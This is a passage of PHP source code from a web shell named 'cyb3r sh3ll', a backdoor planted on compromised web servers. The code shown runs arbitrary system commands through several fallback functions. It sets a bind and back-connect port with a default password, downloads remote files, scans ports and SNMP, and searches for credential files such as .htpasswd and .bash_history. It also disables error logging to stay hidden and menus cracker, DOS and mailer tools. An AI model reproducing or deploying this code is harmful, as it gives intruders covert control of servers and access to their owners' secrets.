112$r=fgets($sock);
113fclose($sock);
114if($r{0}=='+')return 1;
115return 0;
116}
117function check_urL($url,$method,$search,$timeout){
118if(empty($search))$search='200';
119$u=parse_url($url);
120$method=strtoupper($method);
121$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
122$data=(!empty($u['query']))?$u['query']:'';
123if(!empty($data))$data="?$data";
124$sock=@fsockopen($host,80,$en,$es,$timeout);
125if($sock){
126fputs($sock,"$method $file$data HTTP/1.0\r\n");
127fputs($sock,"Host: $host\r\n");
128if($method=='GET')fputs($sock,"\r\n");
129elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
130else return 0;
131if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
132while(!feof($sock)){
133$res=trim(fgets($sock));
134if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
135}
136fclose($sock);
137}
138return 0;
139}
140function snmpchecK($ip,$com,$timeout){
141$res=0;
142$n=chr(0x00);
143$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)).
144$com. chr(0xA0).
145chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
146chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
147chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
148chr(0x01). chr(0x01). $n. chr(0x05). $n;
149$sock=@fsockopen("udp://$ip",161);
150socket_set_timeout($sock,$timeout);
151@fputs($sock,$packet);
152socket_set_timeout($sock,$timeout);
153$res=fgets($sock);
154fclose($sock);
155return $res;
156}
157function checkthisporT($ip,$port,$timeout,$type=0){
158if(!$type){
159$scan=@fsockopen($ip,$port,$n,$s,$timeout);
160if($scan){fclose($scan);return 1;}
161}
162elseif(function_exists('socket_set_timeout')){
163$scan=@fsockopen("udp://".$ip,$port);
164if($scan){
165socket_set_timeout($scan,$timeout);
166@fwrite($scan,"\x00");
167$s=time();
168fread($scan,1);
169if((time()-$s)>=$timeout){fclose($scan);return 1;}
170}
171}
172return 0;
173}
174function get_sw_namE($host,$timeout){
175$sock=@fsockopen($host,80,$en,$es,$timeout);
176if($sock){
177$page=namE().namE();
178fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
179while(!feof($sock)){
180$con=fgets($sock);
181if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
182}
183fclose($sock);
184return -1;
185}return 0;
186}
187function getDisabledFunctions(){
188 if(!ini_get('disable_functions'))
189 {
190 echo "None";
191 }
192 else
193 {
194 echo @ini_get('disable_functions');
195 }
196}
197function showsizE($size){
198if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
199elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
200elseif ($size>=1024)$size = round(($size/1024),2)." KB";
201else $size .= " B";
202return $size;
203}
204function whereistmP(){
205$uploadtmp=ini_get('upload_tmp_dir');
206$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
207if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
208if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
209if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
210if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
211if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
212return ".";
213}
214function downloadiT($get,$put){
215$fo=@strtolower(ini_get('allow_url_fopen'));
216if($fo || $fo=='on')$con=file_get_contents($get);
217else{
218$u=parse_url($get);
219$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
220$url=fsockopen($host, 80, $en, $es, 12);
221fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
222$tmp=$con='';
223while($tmp!="\r\n")$tmp=fgets($url);
224while(!feof($url))$con.=fgets($url);
225}
226$mk=file_put_contents($put,$con);
227if($mk)return 1;
228return 0;
229}
230function flusheR(){
231flush();@ob_flush();
232}
233function namE(){
234$name='';
235srand((double)microtime()*100000);
236for ($i=0;$i<=rand(3,10);$i++){
237$name.=chr(rand(97,122));
238}
239return $name;
240}
241function hlinK($str=""){
242$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','sec','cP','mV','rN','deL');
243$ret=$_SERVER['PHP_SELF']."?";
244$new=explode("&",$str);
245foreach ($_GET as $key => $v){
246$add=1;
247foreach($new as $m){
248$el = explode("=", $m);
249if ($el[0]==$key)$add=0;
250}
251if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
252}
253$ret.=$str;
254return $ret;
255}
256function shelL($command){
257global $windows,$disablefunctions;
258$exec = '';$output= '';
259$dep[]=array('pipe','r');$dep[]=array('pipe','w');
260if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
261elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
262elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
263elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
264elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
265elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
266elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
267return $exec;
268}
269// Registered file-types.
270// array(
271// "{action1}"=>array("ext1","ext2","ext3",...),
272// "{action2}"=>array("ext4","ext5","ext6",...),
273// ...
274// )
275$ftypes = array(
276 "html"=>array("html","htm","shtml"),
277 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
278 "exe"=>array("sh","install","bat","cmd"),
279 "ini"=>array("ini","inf"),
280 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
281 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
282 "sdb"=>array("sdb"),
283 "phpsess"=>array("sess"),
284 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
285);
286// Registered executable file-types.
287// array(
288// string "command{i}"=>array("ext1","ext2","ext3",...),
289// ...
290// )
291// {command}: %f% = filename
292$exeftypes = array(
293 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
294 "perl %f%" => array("pl","cgi")
295);
296/* Highlighted files.
297 array(
298 i=>array({regexp},{type},{opentag},{closetag},{break})
299 ...
300 )
301 string {regexp} - regular exp.
302 int {type}:
3030 - files and folders (as default),
3041 - files only, 2 - folders only
305 string {opentag} - open html-tag, e.g. "<b>" (default)
306 string {closetag} - close html-tag, e.g. "</b>" (default)
307 bool {break} - if TRUE and found match then break
308*/
309$regxp_highlight = array(
310 array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
311 array("config.php",1) // example
312);
313$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
314 // array (i=>{letter} ...); string {letter} - letter of a drive
315//$safemode_diskettes = range("a","z");
316$hexdump_lines = 8;// lines in hex preview file
317$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
318$cx7 =".com";
319$nixpwdperpage = 100; // Get first N lines from /etc/passwd
320$bindport_pass = "cyb3r"; // default password for binding
321$bindport_port = "31373"; // default port for binding
322$bc_port = "31373"; // default port for back-connect
323$cx4 ="/x.";
324$datapipe_localport = "8081"; // default port for datapipe
325// Command-aliases
326if (!$win)
327{
328 $cmdaliases = array(
329 array("-----------------------------------------------------------", "ls -la"),
330 array("find all suid files", "find / -type f -perm -04000 -ls"),
331 array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
332 array("find all sgid files", "find / -type f -perm -02000 -ls"),
333 array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
334 array("find config.inc.php files", "find / -type f -name config.inc.php"),
335 array("find config* files", "find / -type f -name \"config*\""),
336 array("find config* files in current dir", "find . -type f -name \"config*\""),
337 array("find all writable folders and files", "find / -perm -2 -ls"),
338 array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
339 array("find all service.pwd files", "find / -type f -name service.pwd"),
340 array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
341 array("find all .htpasswd files", "find / -type f -name .htpasswd"),
342 array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
343 array("find all .bash_history files", "find / -type f -name .bash_history"),
344 array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
345 array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
346 array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
347 array("list file attributes on a Linux second extended file system", "lsattr -va"),
348 array("show opened ports", "netstat -an | grep -i listen")
349 );
350}
351else
352{
353 $cmdaliases = array(
354 array("-----------------------------------------------------------", "dir"),
355 array("show opened ports", "netstat -an")
356 );
357}
358$sess_cookie = "cyb3rvars"; // Cookie-variable name
359$usefsbuff = TRUE; //Buffer-function
360$px7 ="html";
361$copy_unset = FALSE; //Remove copied files from buffer after pasting
362//Quick launch
363$quicklaunch = array(
364 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
365 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
366 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
367 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
368 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
369 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
370 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
371 array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
372 array("<b>Shell</b>",$surl."act=shells&d=%d"),
373 array("<b>Cracker</b>",$surl."act=cracker&d=%d"),
374 array("<b>Scanner</b>",$surl."act=scanner&d=%d"),
375 array("<b>Net Tools</b>",$surl."act=nettools&d=%d"),
376 array("<b>SQL</b>",$surl."act=sql&d=%d"),
377 array("<b>PHP-code</b>",$surl."act=phpcode&d=%d"),
378 array("<b>Mailer</b>",$surl."act=mailer&d=%d"), //update this section copy from b3t4k shell hardeep
379 array("<b>DOS</b>",$surl."act=dos&d=%d"), //update this section copy from b3t4k shell hardeep
380 array("<b>Local Domain</b>",$surl."act=localdomain&d=%d"), //update this section copy from b3t4k shell hardeep
381 array("<b>Upload</b>",$surl."act=upload&d=%d"),
382 array("<b>About</b>",$surl."act=about&d=%d"), //update this section copy from b3t4k shell hardeep
383 );
384//Highlight-code colors
385$highlight_background = "#c0c0c0";
386$highlight_bg = "#FFFFFF";
387$highlight_comment = "#6A6A6A";
388$highlight_default = "#0000BB";
389$highlight_html = "#1300FF";
390$highlight_keyword = "#007700";
391$highlight_string = "#000000";
392@$f = $_REQUEST["f"];
393@extract($_REQUEST["cyb3rcook"]);
394//END CONFIGURATION
395// -------------- Traceback Functions
396function sendLoginAlert()
397{
398 global $ownerEmail;
399 global $url;
400 $ref=$_SERVER['HTTP_REFERER'];
401 $agent=$_SERVER['HTTP_USER_AGENT'];
402 $accesedIp = $_SERVER['REMOTE_ADDR'];
403 $randomInt = rand(0,1000000); # to avoid id blocking
404 $from = "cyb3r-sh3ll$randomInt@cyb3r.gladiat0r.com";
405 //echo $from;
406 if(function_exists('mail'))
407 {
408 $subject = "Shell Accessed -- cyb3r-Sh3ll --";
409 $message = "
410Hey Owner ,
411
412 Your Shell(cyb3r-Sh3ll) located at $url was accessed by $accesedIp this mail refered by $ref
413 Your shell was accesed by $agent
414
415 If its not you :-
416
417 1. Please check if the shell is secured.
418 2. Change your user name and Password.
419 3. Check if lock is 0n!
420
421 Thanking You
422
423Yours Faithfully
424cyb3r Sh3ll
425 ";
426 mail($ownerEmail,$subject,$message,'From:'.$from);
427 }
428}
429
430//---------------------------------------------------------
431if(function_exists('session_start') && $lock == 'on')
432{
433 session_start();
434}
435else
436{
437 // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
438 $lock = 'off';
439}
440
441//logout
442if(isset($_GET['logout']) && $lock == 'on')
443{
444 $_SESSION['authenticated'] = 0;
445 session_destroy();
446 header("location: ".$_SERVER['PHP_SELF']);
447}
448
449/***************** Restoring *******************************/
450ini_restore("safe_mode_include_dir");
451ini_restore("safe_mode_exec_dir");
452ini_restore("disable_functions");
453ini_restore("allow_url_fopen");
454ini_restore("safe_mode");
455ini_restore("open_basedir");
456if(function_exists('ini_set'))
457{
458 ini_set('error_log',NULL); // No alarming logs
459 ini_set('log_errors',0); // No logging of errors
460 ini_set('file_uploads',1); // Enable file uploads
461 ini_set('allow_url_fopen',1); // allow url fopen
462}
463
464else
465{
466 ini_alter('error_log',NULL);
467 ini_alter('log_errors',0);
468 ini_alter('file_uploads',1);
469 ini_alter('allow_url_fopen',1);
470}
471// ----------------------------------------------------------------------------------------------------------------
472// \/Next code isn't for editing\/
473@set_time_limit(0);
474$tmp = array();
475foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
476$s = "!^(".implode("|",$tmp).")$!i";
477if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"#\">cyb3r sh3ll</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
478?>
479<html>
480<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">
481<title>cyb3r sh3ll | India - <?php echo getenv("HTTP_HOST"); ?></title>
482<?php
483if($antiCrawler != 'off')
484{
485 ?>
486 <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
487 <?php
488}
489?>
490<STYLE>
491TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #15354C; scrollbar-shadow-color: #15354C; scrollbar-highlight-color: #15354C; scrollbar-3dlight-color: #15354C scrollbar-darkshadow-color: #15354C; scrollbar-track-color: #050E14; scrollbar-arrow-color: #D9D9D9; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #050e14;}</style>
492</head>
493<BODY text=#ffffff bottomMargin=0 bgColor=#050e14 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
494<?php
495if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
496{
497 if( $_POST['user'] == $user &&
498 $_POST['pass'] == $pass )
499 {
500 $_SESSION['authenticated'] = 1;
501 // --------------------- Tracebacks --------------------------------
502 if($tracebackFeature == 'On')
503 {
504 sendLoginAlert();
505 }
506 // ------------------------------------------------------------------
507 }
508}
509
510if($lock == 'off')
511{?>
512 <p><font color=red><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>
513<?php
514}
515
516if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
517{
518
519?>
520<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor='#15354c' borderColorLight='#c0c0c0' border=1 bordercolor='#C0C0C0'>
521<tr><td valign='top'><center><font face="times, serif" size="3" color="white">Welcome to the most advanced PHP web Shell- <b><font color=orange>cyb</font>3r Sh<font color=green>3ll</font></b> :: By cyb3r gl4d!470r ...</font></center></td>
522</tr>
523</table>
524<br/>
525
526
527<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0 bordercolor='#C0C0C0'>
528<tr>
529
530<td width="50%"><center><img src="http://s15.postimage.org/94kp4a0ej/indian_flag.png" /></center></td>
531<td><center><img src="http://s15.postimage.org/whiqmsgi3/gladiator.png" width="352px" height="500px"/></center></td>
532</tr>
533</table>
534<div style="position:absolute; border-style:solid;border-width:0px; top:280px;left:280px; right:430px; bottom:180px;" >
535<center><font face="times, serif" color="white">
536 <h1><?php echo $welcome; ?></h1><br /><br />
537 <form method="POST" action="">
538 <input name="user" value="Username"/> <input name="pass" type="password" value="Password"/> <input type="Submit" value="Own This Box!"/>
539 </form>
540 <font size="3">Coded by cyb3r 9ladiat0r for all hacking communities working for my motherland.......<br/><br/>
541
542 Always there to serve my country, My India on any Terms...</font>
543
544 </font>
545</center>
546</div>
547<br/>
548<?php
549}
550//---------------------------------- We are authenticated now-------------------------------------
551//Launch the shell
552else
553{
554
555if ($act != "img")
556
557{
558
559$lastdir = realpath(".");
560
561chdir($curdir);
562
563if ($selfwrite or $updatenow) {@ob_clean(); cyb3r_getupdate($selfwrite,1); exit;}
564
565$sess_data = unserialize($_COOKIE["$sess_cookie"]);
566
567if (!is_array($sess_data)) {$sess_data = array();}
568
569if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
570
571if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
572
573
574
575$disablefunc = @ini_get("disable_functions");
576
577if (!empty($disablefunc))
578
579{
580
581 $disablefunc = str_replace(" ","",$disablefunc);
582
583 $disablefunc = explode(",",$disablefunc);
584
585}
586
587
588
589if (!function_exists("cyb3r_buff_prepare"))
590
591{
592
593function cyb3r_buff_prepare()
594
595{
596
597 global $sess_data;
598
599 global $act;
600
601 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
602
603 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
604
605 $sess_data["copy"] = array_unique($sess_data["copy"]);
606
607 $sess_data["cut"] = array_unique($sess_data["cut"]);
608
609 sort($sess_data["copy"]);
610
611 sort($sess_data["cut"]);
612
613 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
614
615 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
616
617}
618
619}
620
621cyb3r_buff_prepare();
622
623if (!function_exists("cyb3r_sess_put"))
624
625{
626
627function cyb3r_sess_put($data)
628
629{
630
631 global $sess_cookie;
632
633 global $sess_data;
634
635 cyb3r_buff_prepare();
636
637 $sess_data = $data;
638
639 $data = serialize($data);
640
641 setcookie($sess_cookie,$data);
642
643}
644
645}
646
647foreach (array("sort","sql_sort") as $v)
648
649{
650
651 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
652
653 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
654
655}
656
657if ($sort_save)
658
659{
660
661 if (!empty($sort)) {setcookie("sort",$sort);}
662
663 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
664
665}
666
667if (!function_exists("str2mini"))
668
669{
670
671function str2mini($content,$len)
672
673{
674
675 if (strlen($content) > $len)
676
677 {
678
679 $len = ceil($len/2) - 2;
680
681 return substr($content, 0,$len)."...".substr($content,-$len);
682
683 }
684
685 else {return $content;}
686
687}
688
689}
690
691if (!function_exists("view_size"))
692
693{
694
695function view_size($size)
696
697{
698
699 if (!is_numeric($size)) {return FALSE;}
700
701 else
702
703 {
704
705 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
706
707 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
708
709 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
710
711 else {$size = $size . " B";}
712
713 return $size;
714
715 }
716
717}
718
719}
720
721if (!function_exists("fs_copy_dir"))
722
723{
724
725function fs_copy_dir($d,$t)
726
727{
728
729 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
730
731 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
732
733 $h = opendir($d);
734
735 while (($o = readdir($h)) !== FALSE)
736
737 {
738
739 if (($o != ".") and ($o != ".."))
740
741 {
742
743 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
744
745 else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
746
747 if (!$ret) {return $ret;}
748
749 }
750
751 }
752
753 closedir($h);
754
755 return TRUE;
756
757}
758
759}
760
761if (!function_exists("fs_copy_obj"))
762
763{
764
765function fs_copy_obj($d,$t)
766
767{
768
769 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
770
771 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
772
773 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
774
775 if (is_dir($d))
776
777 {
778
779 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
780
781 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
782
783 return fs_copy_dir($d,$t);
784
785 }
786
787 elseif (is_file($d)) {return copy($d,$t);}
788
789 else {return FALSE;}
790
791}
792
793}
794
795if (!function_exists("fs_move_dir"))
796
797{
798
799function fs_move_dir($d,$t)
800
801{
802
803 $h = opendir($d);
804
805 if (!is_dir($t)) {mkdir($t);}
806
807 while (($o = readdir($h)) !== FALSE)
808
809 {
810
811 if (($o != ".") and ($o != ".."))
812
813 {
814
815 $ret = TRUE;
816
817 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
818
819 else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
820
821 if (!$ret) {return $ret;}
822
823 }
824
825 }
826
827 closedir($h);
828
829 return TRUE;
830
831}
832
833}
834
835if (!function_exists("fs_move_obj"))
836
837{
838
839function fs_move_obj($d,$t)
840
841{
842
843 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
844
845 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
846
847 if (is_dir($d))
848
849 {
850
851 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
852
853 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
854
855 return fs_move_dir($d,$t);
856
857 }
858
859 elseif (is_file($d))
860
861 {
862
863 if(copy($d,$t)) {return unlink($d);}
864
865 else {unlink($t); return FALSE;}
866
867 }
868
869 else {return FALSE;}
870
871}
872
873}
874
875if (!function_exists("fs_rmdir"))
876
877{
878
879function fs_rmdir($d)
880
881{
882
883 $h = opendir($d);
884
885 while (($o = readdir($h)) !== FALSE)
886
887 {
888
889 if (($o != ".") and ($o != ".."))
890
891 {
892
893 if (!is_dir($d.$o)) {unlink($d.$o);}
894
895 else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
896
897 }
898
899 }
900
901 closedir($h);
902
903 rmdir($d);
904
905 return !is_dir($d);
906
907}
908
909}
910
911if (!function_exists("fs_rmobj"))
912
913{
914
915function fs_rmobj($o)
916
917{
918
919 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
920
921 if (is_dir($o))
922
923 {
924
925 if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
926
927 return fs_rmdir($o);
928
929 }
930
931 elseif (is_file($o)) {return unlink($o);}
932
933 else {return FALSE;}
934
935}
936
937}
938
939if (!function_exists("myshellexec"))
940
941{
942
943function myshellexec($cmd)
944
945{
946
947 global $disablefunc;
948
949 $result = "";
950
951 if (!empty($cmd))
952
953 {
954
955 if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
956
957 elseif (($result = `$cmd`) !== FALSE) {}
958
959 elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
960
961 elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
962
963 elseif (is_resource($fp = popen($cmd,"r")))
964
965 {
966
967 $result = "";
968
969 while(!feof($fp)) {$result .= fread($fp,1024);}
970
971 pclose($fp);
972
973 }
974
975 }
976
977 return $result;
978
979}
980
981}
982
983if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
984
985if (!function_exists("view_perms"))
986
987{
988
989function view_perms($mode)
990
991{
992
993 if (($mode & 0xC000) === 0xC000) {$type = "s";}
994
995 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
996
997 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
998
999 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
1000
1001 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
1002
1003 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
1004
1005 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
1006
1007 else {$type = "?";}
1008
1009
1010
1011 $owner["read"] = ($mode & 00400)?"r":"-";
1012
1013 $owner["write"] = ($mode & 00200)?"w":"-";
1014
1015 $owner["execute"] = ($mode & 00100)?"x":"-";
1016
1017 $group["read"] = ($mode & 00040)?"r":"-";
1018
1019 $group["write"] = ($mode & 00020)?"w":"-";
1020
1021 $group["execute"] = ($mode & 00010)?"x":"-";
1022
1023 $world["read"] = ($mode & 00004)?"r":"-";
1024
1025 $world["write"] = ($mode & 00002)? "w":"-";
1026
1027 $world["execute"] = ($mode & 00001)?"x":"-";
1028
1029
1030
1031 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
1032
1033 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
1034
1035 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
1036
1037
1038
1039 return $type.join("",$owner).join("",$group).join("",$world);
1040
1041}
1042
1043}
1044
1045if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
1046
1047if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
1048
1049if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
1050
